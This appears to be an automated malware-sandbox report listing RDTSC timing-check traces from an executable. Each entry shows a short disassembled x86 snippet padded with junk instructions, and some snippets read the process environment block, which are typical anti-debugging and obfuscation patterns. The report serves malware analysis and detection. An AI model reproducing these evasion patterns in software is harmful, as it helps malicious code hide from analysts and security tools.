Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 149591F second address: 149594F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA94CE93526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FA94CE93560h 0x00000012 jmp 00007FA94CE93534h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007FA94CE93526h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 149594F second address: 1495953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14DC9E0 second address: 14DCA0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA94CE93533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA94CE93532h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14DCA0B second address: 14DCA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA94CE91926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14DCA17 second address: 14DCA34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA94CE93534h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14D5D90 second address: 14D5D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14D5D94 second address: 14D5D9E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA94CE93526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14D5D9E second address: 14D5DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FA94CE9192Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14EA3EC second address: 14EA418 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA94CE93546h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14EA418 second address: 14EA41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14EA280 second address: 14EA29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93530h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14EA29A second address: 14EA2AC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FA94CE9192Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13A7B9D second address: 13A7BAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007FA94CE93526h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BA9E4 second address: 15BA9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BE882 second address: 15BE897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA94CE93526h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007FA94CE93526h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BEE8A second address: 15BEE90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BEE90 second address: 15BEE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BF013 second address: 15BF035 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA94CE91926h 0x00000008 jbe 00007FA94CE91926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FA94CE9192Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BF035 second address: 15BF039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BF039 second address: 15BF03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15BF164 second address: 15BF173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jbe 00007FA94CE9352Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C1DAA second address: 15C1DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C1E62 second address: 15C1E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C20D3 second address: 15C2162 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA94CE91939h 0x00000008 jmp 00007FA94CE91933h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FA94CE91928h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a and edx, 604E0847h 0x00000030 push 00000004h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FA94CE91928h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c add edx, dword ptr [ebp+122D2ABFh] 0x00000052 mov edx, dword ptr [ebp+122D2AEBh] 0x00000058 call 00007FA94CE91929h 0x0000005d je 00007FA94CE9192Ah 0x00000063 push eax 0x00000064 pushad 0x00000065 popad 0x00000066 pop eax 0x00000067 push eax 0x00000068 push esi 0x00000069 push edi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C2162 second address: 15C2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d ja 00007FA94CE93526h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C2176 second address: 15C2185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA94CE9192Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C2185 second address: 15C21AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FA94CE93531h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 ja 00007FA94CE93526h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C2400 second address: 15C2409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C2409 second address: 15C241D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C241D second address: 15C24ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE91931h 0x00000009 popad 0x0000000a pop esi 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D2A8Fh] 0x00000012 push dword ptr [ebp+122D1839h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FA94CE91928h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 jmp 00007FA94CE91936h 0x00000037 call 00007FA94CE91929h 0x0000003c jmp 00007FA94CE91939h 0x00000041 push eax 0x00000042 ja 00007FA94CE91933h 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c jmp 00007FA94CE9192Eh 0x00000051 mov eax, dword ptr [eax] 0x00000053 jmp 00007FA94CE91938h 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FA94CE9192Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 15C5316 second address: 15C531A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0024 second address: 78B002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B002A second address: 78B002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B002E second address: 78B0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA94CE9192Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, 29E4E35Eh 0x00000017 mov dl, D7h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0050 second address: 78B0098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov dh, cl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA94CE9352Ch 0x00000016 adc esi, 29468F58h 0x0000001c jmp 00007FA94CE9352Bh 0x00000021 popfd 0x00000022 jmp 00007FA94CE93538h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0098 second address: 78B00E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE91931h 0x00000009 sub si, E5A6h 0x0000000e jmp 00007FA94CE91931h 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA94CE91934h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B00E7 second address: 78B00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B00ED second address: 78B0191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 call 00007FA94CE91938h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 18h 0x00000011 pushad 0x00000012 movsx edx, si 0x00000015 call 00007FA94CE91938h 0x0000001a call 00007FA94CE91932h 0x0000001f pop esi 0x00000020 pop ebx 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov edi, esi 0x00000026 mov bx, si 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FA94CE91935h 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA94CE9192Ch 0x00000038 adc ax, 47F8h 0x0000003d jmp 00007FA94CE9192Bh 0x00000042 popfd 0x00000043 mov eax, 4184292Fh 0x00000048 popad 0x00000049 mov ebx, dword ptr [eax+10h] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov di, 8272h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0191 second address: 78B0197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0197 second address: 78B01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bl, ah 0x0000000c mov di, D188h 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 jmp 00007FA94CE91937h 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B01CE second address: 78B01E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B01E9 second address: 78B0261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 423A143Ah 0x00000008 pushfd 0x00000009 jmp 00007FA94CE9192Bh 0x0000000e sub cl, FFFFFFDEh 0x00000011 jmp 00007FA94CE91939h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FA94CE91933h 0x00000024 pushfd 0x00000025 jmp 00007FA94CE91938h 0x0000002a sbb ecx, 5662B638h 0x00000030 jmp 00007FA94CE9192Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0261 second address: 78B0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0267 second address: 78B026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B026B second address: 78B02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA94CE9442Ah 0x0000000e pushad 0x0000000f mov edi, 65133180h 0x00000014 pushfd 0x00000015 jmp 00007FA94CE93539h 0x0000001a adc esi, 15EA3F86h 0x00000020 jmp 00007FA94CE93531h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA94CE9352Dh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B02C2 second address: 78B02E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA94CE9192Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B02E6 second address: 78B030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA94CE93535h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B030D second address: 78B0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE91937h 0x00000009 jmp 00007FA94CE91933h 0x0000000e popfd 0x0000000f mov edi, eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 call dword ptr [77530B60h] 0x0000001a mov eax, 756AE5E0h 0x0000001f ret 0x00000020 jmp 00007FA94CE91932h 0x00000025 push 00000044h 0x00000027 jmp 00007FA94CE91930h 0x0000002c pop edi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 movzx eax, di 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0372 second address: 78B03EC instructions: 0x00000000 rdtsc 0x00000002 call 00007FA94CE93539h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA94CE93531h 0x0000000f movzx eax, bx 0x00000012 pop edi 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 jmp 00007FA94CE93538h 0x0000001a push eax 0x0000001b jmp 00007FA94CE9352Bh 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 pushad 0x00000023 mov ebx, esi 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 mov dl, ch 0x0000002a popad 0x0000002b push dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FA94CE93532h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0436 second address: 78B043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B043A second address: 78B0440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0440 second address: 78B0463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, dh 0x00000010 mov bx, si 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0463 second address: 78B0469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0469 second address: 78B046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B046D second address: 78B050C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 pushfd 0x00000012 jmp 00007FA94CE93538h 0x00000017 adc esi, 6FC32108h 0x0000001d jmp 00007FA94CE9352Bh 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007FA9BCAC271Ch 0x0000002a jmp 00007FA94CE93536h 0x0000002f sub eax, eax 0x00000031 jmp 00007FA94CE93531h 0x00000036 mov dword ptr [esi], edi 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FA94CE9352Ch 0x0000003f or ch, FFFFFFC8h 0x00000042 jmp 00007FA94CE9352Bh 0x00000047 popfd 0x00000048 movzx eax, bx 0x0000004b popad 0x0000004c mov dword ptr [esi+04h], eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 pop esi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B050C second address: 78B055F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA94CE91933h 0x00000008 sub ecx, 467D14BEh 0x0000000e jmp 00007FA94CE91939h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dx, si 0x00000019 popad 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d jmp 00007FA94CE9192Ah 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B055F second address: 78B057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B057E second address: 78B059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B059B second address: 78B0604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE93537h 0x00000009 jmp 00007FA94CE93533h 0x0000000e popfd 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 jmp 00007FA94CE93532h 0x0000001c mov eax, dword ptr [ebx+50h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007FA94CE93538h 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0604 second address: 78B0634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA94CE91937h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0634 second address: 78B0647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 36h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+54h] 0x0000000d pushad 0x0000000e mov ch, F6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0647 second address: 78B06AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 popad 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c pushad 0x0000000d jmp 00007FA94CE91933h 0x00000012 pushfd 0x00000013 jmp 00007FA94CE91938h 0x00000018 or ax, FFE8h 0x0000001d jmp 00007FA94CE9192Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+58h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA94CE91935h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B06AC second address: 78B06B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B06B2 second address: 78B06B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B06B6 second address: 78B06D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA94CE93532h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B06D5 second address: 78B070D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007FA94CE91936h 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 pushad 0x00000015 mov esi, 4DBF43DDh 0x0000001a push eax 0x0000001b push edx 0x0000001c mov esi, 5A24397Fh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B070D second address: 78B0729 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 364CEE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA94CE9352Dh 0x00000014 rdtsc
